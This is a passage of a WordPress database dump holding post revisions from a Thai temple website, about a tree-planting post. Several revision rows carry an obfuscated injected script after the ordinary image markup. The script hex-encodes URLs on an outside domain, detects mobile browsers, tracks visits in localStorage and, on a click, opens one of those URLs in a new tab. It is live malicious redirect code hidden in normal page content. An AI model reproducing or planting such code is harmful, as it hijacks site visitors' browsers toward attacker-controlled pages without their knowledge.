_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:38:56','2024-08-30 03:38:56','',306,'http://watprato.ssk.in.th/?p=317',0,'revision','',0),
(318,2,'2024-08-30 10:38:58','2024-08-30 03:38:58','<!-- wp:generateblocks/container {\"uniqueId\":\"de360999\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:image {\"id\":311,\"sizeSlug\":\"thumbnail\"} -->\n<figure class=\"wp-block-image size-thumbnail\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-150x150.jpg\" alt=\"\" class=\"wp-image-311\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:38:58','2024-08-30 03:38:58','',306,'http://watprato.ssk.in.th/?p=318',0,'revision','',0),
(319,2,'2024-08-30 10:39:33','2024-08-30 03:39:33','','ปลูกต้นไม้','','inherit','open','closed','','%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89-2','','','2024-08-30 10:39:33','2024-08-30 03:39:33','',306,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-1.jpg',0,'attachment','image/jpeg',0),
(320,2,'2024-08-30 10:39:42','2024-08-30 03:39:42','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image -->\n<figure class=\"wp-block-image\"><img alt=\"\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:39:42','2024-08-30 03:39:42','',306,'http://watprato.ssk.in.th/?p=320',0,'revision','',0),
(321,2,'2024-08-30 10:39:44','2024-08-30 03:39:44','<!-- wp:generateblocks/container {\"uniqueId\":\"942fbcb5\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image -->\n<figure class=\"wp-block-image\"><img alt=\"\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75